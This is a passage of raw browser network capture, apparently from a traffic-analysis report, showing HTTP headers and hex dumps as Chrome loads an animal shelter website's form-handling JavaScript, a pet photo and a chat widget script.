                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 56 45 5f 44 61 73 68 2e 61 6a 61 78 5f 6c 6f 61 64 5f 6a 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 61 2e 65 61 63 68 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 73 2c 6e 29 7b 69 66 28 2d 31 21 3d 3d 73 2e 69 6e 64 65 78 4f 66 28 22 5f 62 65 66 6f 72 65 22 29 29 72 65 74 75 72 6e 21 30 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 5b 73 2b 22 5f 62 65 66 6f 72 65 22 5d 26 26 61 28 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 27 2b 65 5b 73 2b 22 5f 62 65 66 6f 72 65 22 5d 2b 22 3c 5c 2f 73 63 72 69 70 74 3e 22 29 2e 61 66 74 65 72 28 74 2e 6c 61 73 74 43 68 69 6c 64 29 2c 73
                                                                                                                                                                                                                                                        Data Ascii: VE_Dash.ajax_load_js=function(e){var t=document.body;a.each(e,(function(s,n){if(-1!==s.indexOf("_before"))return!0;var o=document.createElement("script");e[s+"_before"]&&a('<script type="text/javascript">'+e[s+"_before"]+"<\/script>").after(t.lastChild),s
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC9INData Raw: 2e 24 6a 29 7d 29 28 29 3b
                                                                                                                                                                                                                                                        Data Ascii: .$j)})();


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        57192.168.2.449814192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC458OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/lead-generation.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC676INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 22652
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/lead-generation.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC693INData Raw: 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 5b 22 6c 65 61 64 2d 67 65 6e 65 72 61 74 69 6f 6e 22 5d 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 6c 65 61 64 2d 67 65 6e 65 72 61 74 69 6f 6e 22 2c 21 31 29 2c 28 28 74 2c 65 29 3d 3e 7b 69 66 28 65 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 6c 65 61 64 2d 67 65 6e 65 72 61 74 69 6f 6e 22 29 29 72 65 74 75 72 6e 3b 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 74 63 62 5f 61 66 74 65 72 5f 64 6f 6d 5f 72 65 61 64 79 22 2c 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 74 28 65 2e 55 74 69 6c 73 2e 69 73 45 64 69 74 6f 72 50 61 67 65 28 29 3f 22 23 74 76 65 5f 65 64 69 74 6f 72 22 3a 22 62 6f 64 79 22 29 3b
                                                                                                                                                                                                                                                        Data Ascii: void 0===TCB_Front.js_modules["lead-generation"]&&TCB_Front.setModuleLoadedStatus("lead-generation",!1),((t,e)=>{if(e.isModuleLoaded("lead-generation"))return;t(window).on("tcb_after_dom_ready",(()=>{const r=t(e.Utils.isEditorPage()?"#tve_editor":"body");
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 6f 5f 77 72 61 70 70 65 72 22 29 3b 65 2e 73 69 62 6c 69 6e 67 73 28 22 2e 74 76 65 2d 73 74 61 74 65 2d 65 78 70 61 6e 64 65 64 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 76 65 2d 73 74 61 74 65 2d 65 78 70 61 6e 64 65 64 22 29 2c 65 2e 61 64 64 43 6c 61 73 73 28 22 74 76 65 2d 73 74 61 74 65 2d 65 78 70 61 6e 64 65 64 22 29 7d 29 29 7d 2c 69 6e 69 74 43 68 65 63 6b 62 6f 78 49 6e 70 75 74 73 28 65 29 7b 65 2e 6f 66 66 28 22 63 68 61 6e 67 65 2e 69 6e 70 75 74 63 68 65 63 6b 62 6f 78 22 29 2e 6f 6e 28 22 63 68 61 6e 67 65 2e 69 6e 70 75 74 63 68 65 63 6b 62 6f 78 22 2c 22 2e 74 76 65 5f 6c 67 5f 63 68 65 63 6b 62 6f 78 5f 77 72 61 70 70 65 72 20 69 6e 70 75 74 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 74 68 69 73 29
                                                                                                                                                                                                                                                        Data Ascii: o_wrapper");e.siblings(".tve-state-expanded").removeClass("tve-state-expanded"),e.addClass("tve-state-expanded")}))},initCheckboxInputs(e){e.off("change.inputcheckbox").on("change.inputcheckbox",".tve_lg_checkbox_wrapper input",(function(){const e=t(this)
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 61 2d 73 69 74 65 2d 6b 65 79 22 29 2c 74 68 65 6d 65 3a 65 2e 61 74 74 72 28 22 64 61 74 61 2d 74 68 65 6d 65 22 29 2c 74 79 70 65 3a 65 2e 61 74 74 72 28 22 64 61 74 61 2d 74 79 70 65 22 29 2c 61 70 70 65 61 72 61 6e 63 65 3a 22 65 78 65 63 75 74 65 22 2c 73 69 7a 65 3a 72 7d 29 29 7d 7d 29 29 7d 28 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 35 30 29 7d 28 29 7d 7d 2c 69 6e 69 74 52 65 63 61 70 74 63 68 61 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 22 2e 74 76 65 2d 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 22 29 3b 69 66 28 65 2e 6c 65 6e 67 74 68 26 26 30 21 3d 3d 74 76 65 5f 64 61 73 68 5f 66 72 6f 6e 74 2e 72 65 63 61 70 74 63 68 61 2e 6c 65 6e 67 74 68 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79
                                                                                                                                                                                                                                                        Data Ascii: a-site-key"),theme:e.attr("data-theme"),type:e.attr("data-type"),appearance:"execute",size:r}))}}))}():setTimeout(a,50)}()}},initRecaptcha(){const e=t(".tve-captcha-container");if(e.length&&0!==tve_dash_front.recaptcha.length){function a(){"undefined"!=ty
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 45 58 3d 77 69 6e 64 6f 77 2e 54 43 42 5f 50 41 47 45 5f 49 4e 44 45 58 7c 7c 31 2c 74 68 69 73 2e 65 61 63 68 28 28 28 6e 2c 69 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 74 28 69 29 3b 6c 65 74 20 73 3d 6f 2e 66 69 6e 64 28 22 66 6f 72 6d 22 29 3b 63 6f 6e 73 74 20 64 3d 73 2e 66 69 6e 64 28 22 2e 74 76 65 2d 66 2d 61 2d 68 69 64 64 65 6e 22 29 2e 76 61 6c 28 29 3b 69 66 28 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 6f 2e 66 69 6e 64 28 22 2e 74 68 72 76 5f 6c 65 61 64 5f 67 65 6e 65 72 61 74 69 6f 6e 5f 63 6f 6e 74 61 69 6e 65 72 22 29 2e 77 72 61 70 49 6e 6e 65 72 28 27 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 3c 2f 66 6f 72 6d 3e 27 29 2c 73 3d 6f 2e 66 69 6e 64 28 22 66 6f 72 6d 22 29 29 2c 73 2e 66 69 6e 64 28 22 2e 74 76 65 5f 6c 67
                                                                                                                                                                                                                                                        Data Ascii: EX=window.TCB_PAGE_INDEX||1,this.each(((n,i)=>{const o=t(i);let s=o.find("form");const d=s.find(".tve-f-a-hidden").val();if(0===s.length&&(o.find(".thrv_lead_generation_container").wrapInner('<form method="post"></form>'),s=o.find("form")),s.find(".tve_lg
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 65 72 3d 74 28 27 3c 64 69 76 20 69 64 3d 22 74 76 65 2d 6c 67 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 2f 64 69 76 3e 27 29 2e 70 72 65 70 65 6e 64 54 6f 28 73 2e 70 61 72 65 6e 74 28 29 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 74 76 65 2d 6c 67 2d 65 72 72 2d 63 6c 6f 73 65 22 2c 74 2e 70 72 6f 78 79 28 74 68 69 73 2e 63 6c 6f 73 65 2c 74 68 69 73 29 29 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 65 6d 70 74 79 28 29 2e 68 69 64 65 28 29 2c 74 68 69 73 2e 63 6c 65 61 72 28 29 7d 2c 63 6c 6f 73 65 28 29 7b 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 66 61 64 65 4f 75 74 28 32 30 30 29 3b 6c 65 74 20 74 3d 73 2e 66 69 6e 64 28 22 2e 22 2b 74 68 69 73 2e 65 72 72 43 6c 61 73 73 29 3b
                                                                                                                                                                                                                                                        Data Ascii: er=t('<div id="tve-lg-error-container"></div>').prependTo(s.parent()),this.container.on("click",".tve-lg-err-close",t.proxy(this.close,this))),this.container.empty().hide(),this.clear()},close(){this.container.fadeOut(200);let t=s.find("."+this.errClass);
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 72 43 6c 61 73 73 29 3a 22 73 74 61 74 65 22 3d 3d 3d 72 26 26 22 6e 6f 2d 73 74 61 74 65 22 3d 3d 3d 61 26 26 74 2e 63 6c 6f 73 65 73 74 28 22 2e 74 76 65 5f 6c 67 5f 73 74 61 74 65 22 29 2e 61 64 64 43 6c 61 73 73 28 74 68 69 73 2e 65 72 72 43 6c 61 73 73 29 7d 22 72 65 71 75 69 72 65 64 22 3d 3d 3d 61 26 26 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 66 69 6e 64 28 22 2e 74 76 65 2d 6c 67 2d 72 65 71 75 69 72 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 61 70 70 65 6e 64 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 76 65 2d 6c 67 2d 65 72 72 2d 69 74 65 6d 20 74 76 65 2d 6c 67 2d 27 2b 61 2b 27 22 3e 27 2b 65 2b 22 3c 2f 64 69 76 3e 22 29 7d 2c 73 68 6f 77 28 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74
                                                                                                                                                                                                                                                        Data Ascii: rClass):"state"===r&&"no-state"===a&&t.closest(".tve_lg_state").addClass(this.errClass)}"required"===a&&this.container.find(".tve-lg-required").length||this.container.append('<div class="tve-lg-err-item tve-lg-'+a+'">'+e+"</div>")},show(){if("function"==t
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 65 2c 61 2c 6e 29 2c 72 7d 2c 76 61 6c 69 64 4e 75 6d 62 65 72 28 74 29 7b 63 6f 6e 73 74 20 65 3d 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 61 74 74 72 28 22 6d 61 78 22 29 29 2c 61 3d 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 61 74 74 72 28 22 6d 69 6e 22 29 29 2c 72 3d 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 76 61 6c 28 29 29 2c 6e 3d 74 68 69 73 2e 67 65 74 45 72 72 6f 72 73 28 6f 29 3b 6c 65 74 20 69 3d 21 30 2c 73 3d 6e 2e 6d 69 6e 5f 76 61 6c 75 65 2c 64 3d 6e 2e 6d 61 78 5f 76 61 6c 75 65 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 73 26 26 28 73 3d 22 54 68 65 20 6e 75 6d 62 65 72 20 66 69 65 6c 64 20 73 68 6f 75 6c 64 20 62 65 20 61 74 20 6c 65 61 73 74 20 7b 6d 69 6e 5f 76 61 6c 75 65 7d 22 29 2c 76 6f 69 64 20 30 3d 3d 3d 64 26 26 28 64 3d 22 54 68 65 20
                                                                                                                                                                                                                                                        Data Ascii: e,a,n),r},validNumber(t){const e=parseFloat(t.attr("max")),a=parseFloat(t.attr("min")),r=parseFloat(t.val()),n=this.getErrors(o);let i=!0,s=n.min_value,d=n.max_value;if(void 0===s&&(s="The number field should be at least {min_value}"),void 0===d&&(d="The
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5d 29 7c 28 28 5b 61 2d 7a 41 2d 5a 5c 2d 30 2d 39 5d 2b 5c 2e 29 2b 5b 61 2d 7a 41 2d 5a 5d 7b 32 2c 7d 29 29 24 2f 2e 74 65 73 74 28 74 2e 76 61 6c 28 29 29 26 26 28 74 68 69 73 2e 5f 6d 61 72 6b 45 72 72 6f 72 28 74 2c 65 2c 22 65 6d 61 69 6c 22 29 2c 31 29 29 7d 2c 67 65 74 45 72 72 6f 72 73 28 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 74 2e 66 69 6e 64 28 22 2e 74 76 65 2d 6c 67 2d 65 72 72 2d 6d 73 67 22 29 2e 76 61 6c 28 29 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 7b 66 69 6c 65 5f 65 78 74 65 6e 73 69 6f 6e 3a 22 53 6f 72 72 79 2c 20 7b 66 69 6c 65 65 78 74 65 6e 73 69 6f 6e 7d 20 66 69 6c 65 73 20 61 72 65 20 6e 6f 74 20 61
                                                                                                                                                                                                                                                        Data Ascii: ,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(t.val())&&(this._markError(t,e,"email"),1))},getErrors(t){try{return JSON.parse(t.find(".tve-lg-err-msg").val())}catch(t){return{file_extension:"Sorry, {fileextension} files are not a
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 49 6e 74 28 69 29 29 74 2e 68 69 64 65 28 29 2c 30 3d 3d 3d 72 2e 6c 65 6e 67 74 68 3f 28 61 2e 61 70 70 65 6e 64 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 76 65 2d 65 72 72 6f 72 2d 77 72 61 70 70 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 76 65 2d 65 72 72 6f 72 2d 63 6f 6e 74 65 6e 74 22 3e 3c 2f 64 69 76 3e 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 74 76 65 2d 63 6c 6f 73 65 2d 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 3e 52 65 74 72 79 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 27 29 2c 6e 2e 65 72 72 6f 72 3d 6e 2e 65 72 72 6f 72 2e 72 65 70 6c 61 63 65 28 22 5b 6c 65 61 64 5f 65 6d 61 69 6c 5d 22 2c 64 29 2c 6e 2e 65 72 72 6f 72 3d 6e 2e 65 72 72 6f 72 2e 72 65 70 6c 61 63 65 28 22 5b 6c 65 61 64 5f 6e 61 6d 65 5d 22 2c 6f 29 2c 61
                                                                                                                                                                                                                                                        Data Ascii: Int(i))t.hide(),0===r.length?(a.append('<div class="tve-error-wrapper"><div class="tve-error-content"></div><button class="tve-close-error-message">Retry</button></div>'),n.error=n.error.replace("[lead_email]",d),n.error=n.error.replace("[lead_name]",o),a
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 78 74 28 22 53 65 6c 65 63 74 20 43 6f 75 6e 74 72 79 22 29 2c 61 5b 30 5d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 61 6c 75 65 22 2c 22 22 29 2c 72 29 61 5b 30 5d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 61 6c 75 65 22 2c 72 29 2c 6e 2e 66 69 6e 64 28 22 2e 74 76 65 2d 64 69 73 61 62 6c 65 64 2d 74 65 78 74 2d 69 6e 6e 65 72 22 29 2e 74 65 78 74 28 72 29 3b 65 6c 73 65 20 69 66 28 69 26 26 6f 29 7b 63 6f 6e 73 74 20 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 65 2e 61 74 74 72 28 22 64 61 74 61 2d 64 69 73 70 6c 61 79 2d 6c 69 73 74 22 29 29 5b 30 5d 3b 61 5b 30 5d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 61 6c 75 65 22 2c 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6e 61 6d 65 29 2c 6e 2e 66 69 6e 64 28 22 2e 74 76 65 2d 64 69 73
                                                                                                                                                                                                                                                        Data Ascii: xt("Select Country"),a[0].setAttribute("value",""),r)a[0].setAttribute("value",r),n.find(".tve-disabled-text-inner").text(r);else if(i&&o){const t=JSON.parse(e.attr("data-display-list"))[0];a[0].setAttribute("value",null==t?void 0:t.name),n.find(".tve-dis


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        58192.168.2.44980613.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC622OUTGET /photos/352/7a6849d0-0cb7-4f2e-a0e6-146335e8af7b.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 47957
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Sat, 21 Dec 2024 21:03:41 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD2202F2B0734D
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: 1226533c-201e-002c-2a3a-622430000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015913Z-156796c549bndwlbhC1EWRbq0c000000189g000000000a48
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC15850INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 0b 51 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 12 01 03 00 01 00 00 00 01 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 0f 01 02 00 06 00 00 00 b6 00 00 00 10 01 02 00 0a 00 00 00 bc 00 00 00 1a 01 05 00 01 00 00 00 c6 00 00 00 1b 01 05 00 01 00 00 00 ce 00 00 00 31 01 02 00 07 00 00 00 d6 00 00 00 32 01 02 00 14 00 00 00 dd 00 00 00 3c 01 02 00 0a 00 00 00 f1 00 00 00 1a 01 05 00 01 00 00 00 fb 00 00 00 1b 01 05 00 01 00 00 00 03 01 00 00 69 87 04 00 01 00 00 00 0b 01 00 00 25 88 04 00 01 00 00 00 28 0a 00 00 00 00 00 00 41 70 70 6c 65 00 69 50 68 6f 6e 65 20 31 34 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 31 38 2e 31 2e 31 00 32 30 32 34
                                                                                                                                                                                                                                                        Data Ascii: JFIFHHQExifII*(12<i%(AppleiPhone 14HH18.1.12024
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: e2 ae 34 1a 66 52 ab 75 62 2d 57 51 93 ed 1e 51 c9 0a 3e f1 1d 6b 9e 79 9d 98 4a a4 86 43 90 47 51 ef 56 ee 9a 56 7f 9c ee c0 f9 4e 73 55 00 c4 58 27 96 ae 94 b4 30 6c f4 8f 09 dc 45 ae c3 ab e8 57 6c 89 7f a8 d8 b4 76 d3 37 02 59 57 e7 8c 37 fb 44 8c 67 be 6b cd 13 cd 86 f5 e2 90 15 92 26 c3 a9 e0 82 3b 1a bb 65 73 35 9e a3 6f 75 6e fb 26 86 45 78 db d0 83 c5 75 1e 25 b4 8a fe fa 0d 5a 08 ca a5 ea 79 88 54 74 6f e3 43 ee 0f e9 8a 77 b0 6f b1 c8 4c 1d 2f 23 60 32 8d ce 6b a0 f3 3e 42 41 c8 64 19 e7 a1 eb 59 51 db c8 6d e4 56 04 c4 bc 03 e8 7d 2a ec 23 6e 9e 03 11 bb d3 e9 43 77 40 84 9a 62 51 db 24 e4 f6 aa 25 f7 60 b0 03 1c 0a 98 c3 2c b7 f0 db 22 96 69 1d 55 40 ef bb 81 53 ea b0 5b db 78 92 ea da cc 31 86 23 b5 7c c3 96 24 70 73 f8 e6 92 5a 0c a9 0f 4c
                                                                                                                                                                                                                                                        Data Ascii: 4fRub-WQQ>kyJCGQVVNsUX'0lEWlv7YW7Dgk&;es5oun&Exu%ZyTtoCwoL/#`2k>BAdYQmV}*#nCw@bQ$%`,"iU@S[x1#|$psZL
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC15723INData Raw: 42 80 30 dc 2b 95 e8 cb 48 f9 be ef e0 e5 d9 bd 63 6f 36 62 3d 32 2a b7 fc 29 cd 47 fe 7a fe 95 f5 60 54 c7 dc 14 bb 53 fb a2 ba 23 27 63 39 25 73 c0 f5 7b cd 62 d9 23 df ac cf a6 4b 24 85 63 8f 51 b6 fb e4 76 05 32 7a 7a ad 73 d7 1a c7 8a ad d5 a4 9a d1 ee 2d d4 e3 ce b2 71 3a b7 e0 b9 23 f1 02 be 87 52 b2 44 52 78 d2 7c 92 71 2a ef 00 fa f3 5c dd d7 85 34 1b ab 9f 3c db b5 8c db cb 87 b5 7d b8 27 af 1e f5 fd 2a 7e 6a 79 06 9f e3 1b 3b 8b a6 86 5b 95 f3 57 fe 59 93 b4 83 9e 72 0f 4e 6b b9 b3 9a d2 f6 cc 0f b4 29 c1 23 cb 2d 83 f9 54 7a c7 c3 7b 2d 56 da 45 5b 88 75 09 da 5d c2 4b e4 2b 2c 4b e8 b2 27 cd f9 9f ad 71 6f e0 5b df 09 87 9d 75 4d 42 1b 41 20 0a 5a d0 5e 86 07 b0 28 43 01 f5 14 5b 52 d6 c7 74 c9 f6 9b b8 ed 6d a4 f3 e5 6e 16 35 3c 81 57 61 d3
                                                                                                                                                                                                                                                        Data Ascii: B0+Hco6b=2*)Gz`TS#'c9%s{b#K$cQv2zzs-q:#RDRx|q*\4<}'*~jy;[WYrNk)#-Tz{-VE[u]K+,K'qo[uMBA Z^(C[Rtmn5<Wa


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        59192.168.2.44980865.9.66.854432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC524OUTGET /js/chat.js HTTP/1.1
                                                                                                                                                                                                                                                        Host: cdn.customgpt.ai
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                        Content-Length: 25822
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Date: Thu, 02 Jan 2025 17:50:24 GMT
                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Jan 2025 13:47:19 GMT
                                                                                                                                                                                                                                                        ETag: "01d69629e7e8550c81ca7654836e6f00"
                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                        x-amz-version-id: TbciERkv3wcf7xGMP3gKdGGmuNuiY9Dc
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                        Via: 1.1 14b10bd09a0531ef477d0a404ca26900.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-C1
                                                                                                                                                                                                                                                        X-Amz-Cf-Id: 1bwscS9ODoGN4bD83FpoY0_748zAw-LOKOm3Yb3enUkjTFcMX0hw6Q==
                                                                                                                                                                                                                                                        Age: 547730
                                                                                                                                                                                                                                                        Vary: Origin
